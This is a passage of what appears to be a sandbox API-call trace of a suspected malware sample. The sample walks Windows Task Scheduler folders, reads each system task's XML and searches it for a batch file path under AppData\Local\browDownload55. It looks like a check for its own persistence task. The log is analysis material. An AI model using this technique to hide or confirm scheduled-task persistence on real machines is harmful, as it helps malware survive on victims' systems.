Optimization\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2013-01-01T01:00:00\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c -h -g -# -m 8 -i 13500\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.461] IUnknown:Release (This=0x929620) returned 0x0 [0162.461] IUnknown:Release (This=0x929480) returned 0x0 [0162.461] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.461] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.461] IUnknown:Release (This=0x929480) returned 0x0 [0162.461] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.461] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.461] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.462] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.462] IUnknown:Release (This=0x929470) returned 0x0 [0162.462] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.462] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.462] IUnknown:Release (This=0x929470) returned 0x0 [0162.462] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.462] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3b, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.462] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.463] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0162.463] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.463] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="HybridDriveCachePrepopulate") returned 0x0 [0162.463] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3003)\r\n \\Microsoft\\Windows\\Sysmain\\HybridDriveCachePrepopulate\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n PT2H\r\n IgnoreNew\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {17C82257-654E-4C47-8E23-DCA24EAA76A0}\r\n \r\n \r\n") returned 0x0 [0162.464] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3003)\r\n \\Microsoft\\Windows\\Sysmain\\HybridDriveCachePrepopulate\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n PT2H\r\n IgnoreNew\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {17C82257-654E-4C47-8E23-DCA24EAA76A0}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.464] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.464] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.464] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="HybridDriveCacheRebalance") returned 0x0 [0162.464] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3002)\r\n \\Microsoft\\Windows\\Sysmain\\HybridDriveCacheRebalance\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {D44377B8-1F2F-4FAA-9C8E-6C4AD2928E47}\r\n \r\n \r\n") returned 0x0 [0162.465] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3002)\r\n \\Microsoft\\Windows\\Sysmain\\HybridDriveCacheRebalance\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n 6\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P7D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {D44377B8-1F2F-4FAA-9C8E-6C4AD2928E47}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.465] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.465] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.465] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="ResPriStaticDbSync") returned 0x0 [0162.465] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3004)\r\n \\Microsoft\\Windows\\Sysmain\\ResPriStaticDbSync\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {297EE78C-BA95-4E94-81D3-D6E7F089C7B5}\r\n \r\n \r\n") returned 0x0 [0162.465] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3004)\r\n \\Microsoft\\Windows\\Sysmain\\ResPriStaticDbSync\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT10M\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {297EE78C-BA95-4E94-81D3-D6E7F089C7B5}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.466] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.466] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.466] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="WsSwapAssessmentTask") returned 0x0 [0162.466] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3001)\r\n \\Microsoft\\Windows\\Sysmain\\WsSwapAssessmentTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P30D\r\n P31D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n sysmain.dll,PfSvWsSwapAssessmentTask\r\n \r\n \r\n") returned 0x0 [0162.466] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3000)\r\n $(@%systemRoot%\\System32\\sysmain.dll,-3001)\r\n \\Microsoft\\Windows\\Sysmain\\WsSwapAssessmentTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P30D\r\n P31D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n sysmain.dll,PfSvWsSwapAssessmentTask\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.467] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.467] IUnknown:Release (This=0x929460) returned 0x0 [0162.467] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.467] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.467] IUnknown:Release (This=0x929460) returned 0x0 [0162.467] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.467] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3c, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.467] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.467] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.467] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.468] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="SR") returned 0x0 [0162.468] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n \\Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P3DT1M\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\srtasks.exe\r\n ExecuteScheduledSPPCreation\r\n \r\n \r\n") returned 0x0 [0162.468] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\srrstr.dll,-320)\r\n $(@%systemroot%\\system32\\srrstr.dll,-321)\r\n $(@%systemroot%\\system32\\srrstr.dll,-322)\r\n \\Microsoft\\Windows\\SystemRestore\\SR\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P3D\r\n P3DT1M\r\n true\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\srtasks.exe\r\n ExecuteScheduledSPPCreation\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.468] IUnknown:Release (This=0x929600) returned 0x0 [0162.468] IUnknown:Release (This=0x929470) returned 0x0 [0162.468] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.468] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.468] IUnknown:Release (This=0x929470) returned 0x0 [0162.469] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.469] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.469] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.469] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.469] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.469] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="Interactive") returned 0x0 [0162.469] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n \\Microsoft\\Windows\\Task Manager\\Interactive\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 5\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {855FEC53-D2E4-4999-9E87-3414E9CF0FF4}\r\n \r\n \r\n \r\n") returned 0x0 [0162.469] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%systemroot%\\system32\\wdc.dll,-10042)\r\n $(@%systemroot%\\system32\\wdc.dll,-10041)\r\n $(@%systemroot%\\system32\\wdc.dll,-10043)\r\n \\Microsoft\\Windows\\Task Manager\\Interactive\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n 5\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {855FEC53-D2E4-4999-9E87-3414E9CF0FF4}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.470] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.470] IUnknown:Release (This=0x929470) returned 0x0 [0162.470] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.470] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.470] IUnknown:Release (This=0x929470) returned 0x0 [0162.470] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.470] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3e, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.470] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.471] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0162.471] IUnknown:Release (This=0x929470) returned 0x0 [0162.471] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.471] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.471] IUnknown:Release (This=0x929470) returned 0x0 [0162.471] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.471] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3f, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.471] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.471] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.471] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929620) returned 0x0 [0162.472] IRegisteredTask:get_Name (in: This=0x929620, pName=0xce058 | out: pName=0xce058*="MsCtfMonitor") returned 0x0 [0162.472] IRegisteredTask:get_Xml (in: This=0x929620, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \\Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\r\n \r\n \r\n") returned 0x0 [0162.473] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \\Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n true\r\n Parallel\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.473] IUnknown:Release (This=0x929620) returned 0x0 [0162.473] IUnknown:Release (This=0x929480) returned 0x0 [0162.473] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.474] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.474] IUnknown:Release (This=0x929480) returned 0x0 [0162.474] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.474] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x40, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.474] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929480) returned 0x0 [0162.475] IRegisteredTaskCollection:get_Count (in: This=0x929480, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.475] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.475] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="ForceSynchronizeTime") returned 0x0 [0162.475] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-600)\r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-602)\r\n \\Microsoft\\Windows\\Time Synchronization\\ForceSynchronizeTime\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT1M\r\n 7510BCA32F018915\r\n \r\n \r\n \r\n \r\n {A31AD6C2-FF4C-43D4-8E90-7101023096F9}\r\n \r\n \r\n \r\n") returned 0x0 [0162.475] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-600)\r\n $(@%SystemRoot%\\system32\\TimeSyncTask.dll,-602)\r\n \\Microsoft\\Windows\\Time Synchronization\\ForceSynchronizeTime\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT1M\r\n 7510BCA32F018915\r\n \r\n \r\n \r\n \r\n {A31AD6C2-FF4C-43D4-8E90-7101023096F9}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.476] IUnknown:Release (This=0x929610) returned 0x0 [0162.476] IRegisteredTaskCollection:get_Item (in: This=0x929480, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929610) returned 0x0 [0162.476] IRegisteredTask:get_Name (in: This=0x929610, pName=0xce058 | out: pName=0xce058*="SynchronizeTime") returned 0x0 [0162.476] IRegisteredTask:get_Xml (in: This=0x929610, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n \\Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n") returned 0x0 [0162.476] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n \\Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.476] IUnknown:Release (This=0x929610) returned 0x0 [0162.476] IUnknown:Release (This=0x929480) returned 0x0 [0162.476] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929480) returned 0x0 [0162.477] ITaskFolderCollection:get_Count (in: This=0x929480, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.477] IUnknown:Release (This=0x929480) returned 0x0 [0162.477] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.477] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x41, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.477] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.478] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.478] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.478] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="SynchronizeTimeZone") returned 0x0 [0162.478] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2013-01-10T16:32:04.2837388\r\n $(@%SystemRoot%\\system32\\tzsyncres.dll,-101)\r\n $(@%SystemRoot%\\system32\\tzsyncres.dll,-102)\r\n \\Microsoft\\Windows\\Time Zone\\SynchronizeTimeZone\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n PT1H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\tzsync.exe\r\n \r\n \r\n") returned 0x0 [0162.478] StrStrIW (lpFirst="\r\n\r\n \r\n 2013-01-10T16:32:04.2837388\r\n $(@%SystemRoot%\\system32\\tzsyncres.dll,-101)\r\n $(@%SystemRoot%\\system32\\tzsyncres.dll,-102)\r\n \\Microsoft\\Windows\\Time Zone\\SynchronizeTimeZone\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n PT1H\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P7D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\tzsync.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 